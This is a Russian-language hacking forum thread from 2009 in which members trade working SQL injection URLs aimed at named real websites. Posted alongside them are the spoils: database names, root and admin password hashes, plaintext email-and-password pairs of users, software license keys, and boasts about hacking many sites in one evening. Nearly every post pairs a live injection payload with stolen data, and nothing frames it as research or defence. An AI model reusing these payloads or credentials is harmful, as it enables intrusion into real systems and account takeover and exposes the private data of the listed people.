SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. spherics

    spherics Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    190
    Likes Received:
    162
    Reputations:
    25

    http://www.webdesigners.ro/forum/admin/

    Основное тело это webmaster c одним и тем же хешом так что думаю мы на верном пути -)


    webmaster:b46b0fb4559b9f0f01635aa25ac942dd


    Пароль не перебрал попробуй если переберешь в админке форума покопать я так думаю там не проблема будет залить че нить куда нить.


    А вообще по их сайтам форум багнутый так что может тебе повезет всё таки через форум их достать



    Database Version: 5.0.27-log
    Database name: webdesigners
    User name: webdesigners@htdweb


    Этих людей достал но не знаю нужны ли они тебе

    логин пароль мыло
    emobil:cantemir : contact@htd.ro
    crocodilul:cantemir : contact@htd.ro
    singur:cantemir : contact@htd.ro
    sexpert:cantemir : contact@htd.ro
    1tuningclient : cantermir:contact@htd.ro

    В общем удачи.
     
    1 person likes this.
  2. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    Db:aaaacby_meridianproductivity
    Version:5.0.32-Debian_7etch8-log
    User:aaaacba_meridian@192.168.214.62

     
    1 person likes this.
  3. spherics

    spherics Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    190
    Likes Received:
    162
    Reputations:
    25
    Еще рут -)

    Database Version: 4.1.14-nt
    Database name: rsvp
    User name: root@localhost



    root : 1c2e84cd19d4344c хэш MySQL : 1c2e84cd19d4344c : sli9Gnet

    В базу с любых хостов под рутом -)

    Читаем файло c:\boot.ini

    Хех это я так отвлёкся....


    Database Version: 4.1.12-standard-log
    Database name: kknk_db1
    User name: sandbn_16@www37.cpt1.host-h.net




    Database Version: 4.1.22-standard
    Database name: ofwguide_ofwguidedb
    User name: ofwguide_abbie@localhost



    Microsoft SQL Server 2000 - 8.00.679 (Intel X86) Aug 26 2002 15:09:48 Copyright (c) 1988-2000 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4

    HTML:
    http://www.archidb.com/archiinfo/3.asp?div_id=09&product_id=500+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('DETAILS','BOARD','CATALOG','CATALOG_TEMP','CDCONT','COMPANY','COMPANY_REJECT','D99_Tmp','DET_CODE','DET_VIEW','DETAILS_TEMP','division','dtproperties','FREE','FREEBOARD','GRP_CODE','GRP_VIEW','h_NEWS','input_c','j_BOARD','jorye','NEWSBOARD','NOTICE','poll','poll_re','POSTNO','PRODUCTS','PRODUCTS_CHECK','PRODUCTS_REJECT','PRODUCTS_TEMP','PRODUCTS_TEMP_CHECK,'PRODUCTS_TEMP_CHECK'))--&compa
     
    #7523 spherics, 31 Jan 2009
    Last edited: 31 Jan 2009
    1 person likes this.
  4. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    root:41a2cc174ae9076e:localhost:Y:akvadra:5.0.27:news@localhost:

    плюс куча всяких юзверей..
     
    2 people like this.
  5. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    http://www.wowpourlesnuls.fr/images.php?img=-1%20union%20select%201,group_concat(table_name)%20from%20information_schema.tables%20%20--
    ===============

    http://www.theonlineadnetwork.com/affiliates/sim.php?itemid=-1%20union%20select%201,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.columns where table_name=0x41646d696e-- (Пароль админа и всех юзеров без хеша, пейпал данныи и т.д.))
    ===============

    http://desilassi.com/song.php?l_id=-1%20union%20select%201,2,concat(log_id,0x3a,log_name,0x3a,log_pass,0x3a,log_emailid,0x3a,mailing_list,0x3a,conform),4,5,6,7,8%20from%20desi_login-- (Туева хуча пользователей паролей и мыльников и никаких хешей =)) Я уже окло 50 идиотов отобрал которые мыльники регают с одинаковыми паролями как и на сайте ))

    ПСЖ че то седня день удачдный, больше 10 сайтов за вечер хакнул =))

    PS: ВОт админские 1:admin:admin6002
    Найти бы админку... =))
     
    #7525 Assembler, 31 Jan 2009
    Last edited by a moderator: 31 Jan 2009
  6. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    PR5

    http://mial.cs.sfu.ca/newsItem.php?id=-1+union+select+1,Username,3,Password,5,6,7,8+from+User--

    Пароль почему то пустой
    Кто хочет, сам пусть ковыряется
    Админка mial.cs.sfu.ca/admin
     
    #7526 diznt, 31 Jan 2009
    Last edited: 31 Jan 2009
    1 person likes this.
  7. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    http://www.visa-tour.ru/sim.php?parent_id=-1%20union%20select%201,group_concat(table_name),3,4,5,6,7,8,9%20from%20information_schema.tables--
     
  8. spherics

    spherics Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    190
    Likes Received:
    162
    Reputations:
    25
    Программа какая-то серьезная 500 $ стоимость лицензии Project Management Methodology

    Проданно более 1500 лиц.Ну да ладно неважно -)



    Database Version: 5.0.27-community-nt
    Database name: jwestland
    User name: jwestland@localhost

    Fields email:password

    : jason@method123.com : Klimber56
    : remko@paradise.net.nz : pukeora
    : bassam@eim.ae : QPGklPZ
    : dunnigr@socom.mil : GM78tBm
    : kasboko@yahoo.com :
    : grarms@ship.edu : allison



    Fields user_id:version:license_id:license_num:serial_no:maint_expiry

    :1704 : educational : 0:1:682R6-TQYVZ-28O0U-EHV32:2009-07-11 08:41:28
    :1705:professional : 0:2:IVUGX-7M7CZ-XK0A3-CYSS1:2009-07-11 09:59:24
    :1706:educational : 0:1:IWWHM-TOAAZ-9A3OW-PT9R3:2009-07-11 10:09:35
    :1707:professional : 0:1:5NEB7-X4YCZ-2OG32-DAJJ5:2009-07-11 11:54:52
    :1709:professional : 0:1:HAXR4-G6VEZ-Y3LGW-LP5N4:2009-07-13 09:48:56
    :1710:standard : 0:1:LDOB0-GDVQZ-L86WV-9AP02:2009-07-14 02:40:48




    Таблеточки таблеточки -)


    Database Version: 5.0.16-log
    Database name: dreddy_clinic
    User name: dreddy-clinic@localhost


    Дядя или Тётя Админ суть не в этом

    HTML:
    http://www.dreddy-clinic.com/details.php?product_id=13876876859+UNION+SELECT+1,2,3,4,5,6,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,(SELECT+CONCAT(u,0x3a,pass,0x3a,enable)+FROM+dreddy_clinic.u+LIMIT+0,1),0x3a),0x71),0x71),8,9,10,11,12,13,14,15,16,17,18,19,20-- 

    dreddy-clinic : 408c05fba1f0a28b9a74ddaf6f79991d :


    Теперь дядей Тётей из пользователей


    HTML:
    http://www.dreddy-clinic.com/details.php?product_id=13876876859+UNION+SELECT+1,2,3,4,5,6,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,(SELECT+CONCAT(username,0x3a,password,0x3a,email)+FROM+dreddy_clinic.users+LIMIT+1,1),0x3a),0x71),0x71),8,9,10,11,12,13,14,15,16,17,18,19,20--
    Там в общем есть еще phpbb 3 но зачем -)
     
    #7528 spherics, 1 Feb 2009
    Last edited: 1 Feb 2009
    2 people like this.
  9. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    http://www.fixfault.com/fix.php?grp=-1+union+select+1,group_concat(id,0x3a,group_name,0x3a,picture_id),3%20from%20group_data%20--
     
  10. spherics

    spherics Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    190
    Likes Received:
    162
    Reputations:
    25
    Database Version: 5.0.45
    Database name: kyma
    User name: controls_moz@136899-web1.www.kyma.com


    Дядьки админы


    : admin : kyma : pkonecny@KYMA.com



    Сама Админка



    Version: 4.1.22
    User: apples@localhost
    Database: apples



    Version: 4.1.22-max-log
    User: an719ue80rce@208.109.181.115
    Database: an719ue80rce




    Database Version: 4.1.12
    Database name: cassattMain
    User name: dbCassatt@localhost
     
    1 person likes this.
  11. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    4 version()
    Code:
    http://www.transit.lt/next.php?nr=81&firma=-8%20union%20select%201,2,3,4,5,6,pass,8%20from%20users--
    
    Code:
    http://www.terberken.be/sitelies/incl/lager/mvd.php?id=-31%20union%20select%201,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17%20--
    Code:
    http://www.koreandog.co.kr/01kennel/02diary/love.php?page=1&knum=-4%20union%20select%201,2,3,4,5,6,7,8,9,10,11,version(),13,14,15,16,17,18,19,20,21,22--
    Code:
    http://tingdong.powersugoi.net/song.php?song=-1%20union%20select%201,2,version(),4,5,6,7,8,9,10,11,12,13,14,15--
    Code:
    http://www.nepomn.ru/song.php?variant_id=123123123%20union%20select%201,2,3,4,5,6,7,8,9,10,version(),12,13,14,15,16,17--
     
    #7531 Assembler, 1 Feb 2009
    Last edited by a moderator: 1 Feb 2009
    1 person likes this.
  12. spherics

    spherics Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    190
    Likes Received:
    162
    Reputations:
    25
    PageRank = 7


    Version: 4.1.22-standard
    User: rmc@localhost
    Database: rmc_presidents_new



    Database Version: 4.1.14
    Database name: modbamboo
    User name: yroot@localhost



    Version: 4.1.22-standard
    User: niteize_info@localhost
    Database: niteize_info


    Database Version: 5.0.67-community
    Database name: alurwan9_aluratek
    User name: alurwan9_web@localhost




    Microsoft SQL Server 2005 - 9.00.3175.00 (Intel X86) Jun 14 2007 09:20:57 Copyright (c) 1988-2005 Microsoft Corporation Workgroup Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
     
    #7532 spherics, 1 Feb 2009
    Last edited: 1 Feb 2009
  13. Ламоза

    Ламоза Member

    Joined:
    26 Jul 2008
    Messages:
    22
    Likes Received:
    7
    Reputations:
    0
    4.1.11-Debian_4sarge7
    fedline@localhost

    Смотреть в тайтл
    dbuser@localhost
    5.0.27
    admin:$P$BulIvm2PP9ASqfoU5bQGiogFgrDlgT/

    Вывод в сорсе смотрим
    4.1.16-standard-log
    leeuwinestate@abcamps.databases.armato.com.au

    5.0.22
    mydomains_moodiedb@tbl_administrator
    {
    admin_name
    admin_username
    admin_password
    }
    REVO:3f9c206f764fc1582a64eb7a5a7ca20c079a0ae8:6mbhcd
    Martin:3458e1c69536aacc7e0e015a8085484b5c95d2ad:maryam
    jon:a1bf7a55f83a2956114b77137074f1e3a6b5c036:maunsell
    matt:2f7d6e26289946e37e1fa56d4643771ad2c6b193:m00di3
    mydomains_moodiedb@user
    mydomains_moodiedb@wp_users
     
  14. fortune

    fortune New Member

    Joined:
    8 Jan 2009
    Messages:
    5
    Likes Received:
    3
    Reputations:
    0
    http://rmc.library.cornell.edu/presidents/exhibition.php?sec=1+union+select+1,concat(user,0x3a,password),3%20from%20mysql.user--
     
    2 people like this.
  15. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    PR4

    http://www.baneasashoppingcity.ro/event.php?id=-6+UNION+SELECT+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8--

    Database Version: 5.0.45
    Database name: bsc
    User name: bscwww@localhost
     
  16. masternet

    masternet Elder - Старейшина

    Joined:
    18 May 2008
    Messages:
    58
    Likes Received:
    43
    Reputations:
    0
    http://www.templateshunt.com/template.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
     
    #7536 masternet, 1 Feb 2009
    Last edited by a moderator: 1 Feb 2009
  17. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    PR5

    http://www.salutbucuresti.ro/index.php?pc=detalii&categ=0&id=-1012+UNION+SELECT+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13/*


    Database Version: 5.0.27
    Database name: salut
    User name: salut@localhost
     
  18. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    Code:
    http://www.davespictures.org/concertsinmichigan/fix.php?type=venue&id=-1%20union%20select%201,2,version(),User(),5,6,7%20--
    
     
  19. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    _http://www.dittberner.com/

    Code:
    http://www.dittberner.com/reports/about.php?id=-5+union+select+1,2,3,4,username,6,7,8+from+user+limit+1,1--
    Code:
    http://www.dittberner.com/reports/about.php?id=-5+union+select+1,2,3,4,password,6,7,8+from+user+limit+1,1--
    varbobitis:6215defe2a2da202

    Code:
    http://www.dittberner.com/login.php
    PR: 5
     
    _________________________
    4 people like this.
  20. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    http://www.ugbs.edu.gh/site/newsevents/newsdetails.php?id=-70+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10--
     
    2 people like this.
Thread Status:
Not open for further replies.